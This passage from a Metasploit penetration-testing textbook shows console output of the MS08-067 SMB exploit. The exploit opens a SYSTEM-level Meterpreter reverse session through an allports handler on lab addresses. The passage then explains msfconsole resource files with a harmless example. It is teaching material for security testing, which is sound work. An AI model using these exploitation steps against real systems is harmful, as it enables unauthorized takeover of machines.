background image

72

Chapter 5

msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.33.129:1 
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:1 -> 192.168.33.130:1047) 

msf exploit(ms08_067_netapi) > 

sessions -l -v

Active sessions
===============

  Id  Type         Information                         Connection                               Via
  --  ----         -----------                         ----------                               ---
  1   meterpreter  NT AUTHORITY\SYSTEM @ IHAZSECURITY  192.168.33.129:1 -> 192.168.33.130:1047  

exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > 

sessions -i 1

[*] Starting interaction with 1...

meterpreter >

Notice that we do not set an 

LPORT

; instead, we use 

allports

 because we 

are going to try to connect out of the network on each port until we find an 
open one. If you look closely at   you will see that our attacker machine is 
bound to 

:1

 (all ports) and that it finds a port outbound on port 1047   on 

the target network.

Resource Files

Resource files

 are script files that automate commands within 

msfconsole

. They 

contain a list of commands that are executed from 

msfconsole

 and run sequen-

tially. Resource files can greatly reduce testing and development times, allow-
ing you to automate many repetitive tasks, including exploitation.

Resource files can be loaded from 

msfconsole

 with the 

resource

 command, or 

they can be passed as a command-line argument with the 

-r

 switch.

The simple example shown next creates a resource file that displays our 

Metasploit version and then loads the sounds plug-in:

root@bt:/opt/framework3/msf3/ 

echo version > resource.rc 

root@bt:/opt/framework3/msf3/ 

echo load sounds >> resource.rc

 

root@bt:/opt/framework3/msf3/ 

msfconsole -r resource.rc

 

 resource (resource.rc)> version

Framework: 3.7.0-dev.12220
Console  : 3.7.0-dev.12220
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf >

As you can see at   and  , the 

version

 and 

load sounds

 commands are 

echoed into a text file called 

resource.rc

. This file is then passed to 

msfconsole

 at 

the command line at   with the 

-r

 switch, and when the file begins to load, the 

commands are executed at   from the resource file.